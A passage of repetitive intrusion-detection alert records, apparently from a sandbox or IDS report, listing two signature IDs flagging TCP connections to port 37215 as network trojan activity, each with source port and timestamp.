          SID:2835222
          Source Port:46578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931424
          SID:2829579
          Source Port:58132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692095
          SID:2835222
          Source Port:54654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916032
          SID:2829579
          Source Port:60970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283735
          SID:2835222
          Source Port:35078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860431
          SID:2835222
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241794
          SID:2835222
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084769
          SID:2829579
          Source Port:60344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945232
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644528
          SID:2835222
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159469
          SID:2829579
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168681
          SID:2829579
          Source Port:59050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930332
          SID:2835222
          Source Port:46678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162159
          SID:2829579
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986481
          SID:2829579
          Source Port:46056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287241
          SID:2835222
          Source Port:59550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246065
          SID:2829579
          Source Port:57228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169004
          SID:2829579
          Source Port:33246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646089
          SID:2829579
          Source Port:52016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897631
          SID:2835222
          Source Port:40280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928750
          SID:2835222
          Source Port:36234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418946
          SID:2835222
          Source Port:33046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253230
          SID:2835222
          Source Port:47106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133328
          SID:2829579
          Source Port:56916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105327
          SID:2829579
          Source Port:57770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412235
          SID:2835222
          Source Port:52356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102306
          SID:2835222
          Source Port:43674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034233
          SID:2835222
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296928
          SID:2835222
          Source Port:38398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400121
          SID:2829579
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717848
          SID:2835222
          Source Port:46852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296818
          SID:2835222
          Source Port:37912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288012
          SID:2829579
          Source Port:38074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952271
          SID:2829579
          Source Port:39500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865890
          SID:2829579
          Source Port:49994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537765
          SID:2829579
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035369
          SID:2835222
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008242
          SID:2835222
          Source Port:58236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818675
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281123
          SID:2829579
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161951
          SID:2829579
          Source Port:50680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243550
          SID:2829579
          Source Port:39748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286055
          SID:2835222
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104399
          SID:2829579
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412755
          SID:2829579
          Source Port:52474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720806
          SID:2835222
          Source Port:56790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597020
          SID:2835222
          Source Port:49268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010787
          SID:2835222
          Source Port:39028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719354
          SID:2835222
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412385
          SID:2835222
          Source Port:46088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418866
          SID:2829579
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222991
          SID:2835222
          Source Port:57340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077592
          SID:2829579
          Source Port:58280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986144
          SID:2829579
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396150
          SID:2835222
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635080
          SID:2829579
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867078
          SID:2829579
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594965
          SID:2835222
          Source Port:44732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160146
          SID:2829579
          Source Port:49838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864320
          SID:2835222
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724070
          SID:2835222
          Source Port:57680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644560
          SID:2829579
          Source Port:47092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.681985
          SID:2835222
          Source Port:40454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413073
          SID:2829579
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418191
          SID:2835222
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397941
          SID:2829579
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900283
          SID:2829579
          Source Port:37574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289088
          SID:2829579
          Source Port:60962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038833
          SID:2835222
          Source Port:34720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721064
          SID:2829579
          Source Port:33796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274664
          SID:2829579
          Source Port:38472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818172
          SID:2835222
          Source Port:45254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225710
          SID:2835222
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564135
          SID:2835222
          Source Port:35694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947132
          SID:2835222
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928174
          SID:2829579
          Source Port:46176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165990
          SID:2835222
          Source Port:39188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290146
          SID:2829579
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077551
          SID:2829579
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713174
          SID:2835222
          Source Port:41416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027826
          SID:2829579
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300491
          SID:2835222
          Source Port:47588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914486
          SID:2835222
          Source Port:41788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868775
          SID:2829579
          Source Port:59308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166596
          SID:2829579
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643477
          SID:2835222
          Source Port:54428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946658
          SID:2829579
          Source Port:45430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917109
          SID:2835222
          Source Port:36518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.723501
          SID:2829579
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714211
          SID:2829579
          Source Port:58742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991439
          SID:2835222
          Source Port:50496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557944
          SID:2835222
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714955
          SID:2835222
          Source Port:48472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818422
          SID:2835222
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645882
          SID:2835222
          Source Port:35850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037914
          SID:2835222
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301162
          SID:2829579
          Source Port:42936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563506
          SID:2829579
          Source Port:43908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894480
          SID:2835222
          Source Port:37422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163319
          SID:2835222
          Source Port:37584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031942
          SID:2835222
          Source Port:46662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691938
          SID:2835222
          Source Port:47956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688205
          SID:2829579
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.086540
          SID:2835222
          Source Port:41998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243909
          SID:2829579
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603467
          SID:2829579
          Source Port:52104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081912
          SID:2829579
          Source Port:57016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604683
          SID:2829579
          Source Port:52318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413535
          SID:2829579
          Source Port:33964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032896
          SID:2829579
          Source Port:37634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206742
          SID:2835222
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988569
          SID:2829579
          Source Port:44494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226761
          SID:2835222
          Source Port:43656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996695
          SID:2829579
          Source Port:58132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028740
          SID:2835222
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027881
          SID:2829579
          Source Port:34220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718800
          SID:2835222
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926809
          SID:2835222
          Source Port:33206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928954
          SID:2829579
          Source Port:39022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553739
          SID:2829579
          Source Port:53638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289043
          SID:2829579
          Source Port:33056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676164
          SID:2835222
          Source Port:57072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207860
          SID:2835222
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160338
          SID:2835222
          Source Port:38750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302353
          SID:2835222
          Source Port:46984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288926
          SID:2829579
          Source Port:38038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478958
          SID:2835222
          Source Port:56050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104839
          SID:2829579
          Source Port:52782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161992
          SID:2835222
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246122
          SID:2829579
          Source Port:42542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128107
          SID:2835222
          Source Port:40490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413107
          SID:2835222
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312634
          SID:2829579
          Source Port:49728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985165
          SID:2829579
          Source Port:53934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205651
          SID:2829579
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599489
          SID:2829579
          Source Port:39362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948900
          SID:2835222
          Source Port:44112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028855
          SID:2829579
          Source Port:39220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900053
          SID:2835222
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286651
          SID:2835222
          Source Port:38658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688079
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413710
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910736
          SID:2829579
          Source Port:41152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923573
          SID:2829579
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226242
          SID:2835222
          Source Port:58996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281199
          SID:2829579
          Source Port:45512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558321
          SID:2829579
          Source Port:50256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014386
          SID:2829579
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606803
          SID:2829579
          Source Port:38046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078747
          SID:2835222
          Source Port:47084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644074
          SID:2829579
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987186
          SID:2829579
          Source Port:52218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283658
          SID:2835222
          Source Port:58124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721466
          SID:2835222
          Source Port:55628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073847
          SID:2835222
          Source Port:60836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682046
          SID:2829579
          Source Port:50154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164505
          SID:2829579
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595082
          SID:2835222
          Source Port:33148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598024
          SID:2829579
          Source Port:36382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861267
          SID:2835222
          Source Port:44894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822976
          SID:2829579
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357403
          SID:2835222
          Source Port:35866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079342
          SID:2829579
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246160
          SID:2835222
          Source Port:35926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076420
          SID:2829579
          Source Port:37554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164181
          SID:2829579
          Source Port:46526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032868
          SID:2829579
          Source Port:41594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169221
          SID:2829579
          Source Port:33748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948846
          SID:2835222
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298860
          SID:2835222
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248057
          SID:2829579
          Source Port:34950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724084
          SID:2835222
          Source Port:47174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931395
          SID:2829579
          Source Port:35152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104801
          SID:2829579
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272257
          SID:2835222
          Source Port:54238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905150
          SID:2829579
          Source Port:45480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168681
          SID:2829579
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395817
          SID:2829579
          Source Port:58908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288164
          SID:2835222
          Source Port:57238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223471
          SID:2835222
          Source Port:38012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163151
          SID:2829579
          Source Port:35198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399885
          SID:2829579
          Source Port:46170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919148
          SID:2835222
          Source Port:44610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275757
          SID:2835222
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928157
          SID:2829579
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039020
          SID:2829579
          Source Port:46598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031803
          SID:2829579
          Source Port:41344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166635
          SID:2835222
          Source Port:48000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034060
          SID:2835222
          Source Port:51618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079190
          SID:2829579
          Source Port:37062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944513
          SID:2835222
          Source Port:37026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225365
          SID:2829579
          Source Port:51396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719910
          SID:2829579
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596414
          SID:2835222
          Source Port:48078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925517
          SID:2835222
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120544
          SID:2829579
          Source Port:55576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990485
          SID:2829579
          Source Port:52486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916874
          SID:2835222
          Source Port:54058
          Destination Port:37215
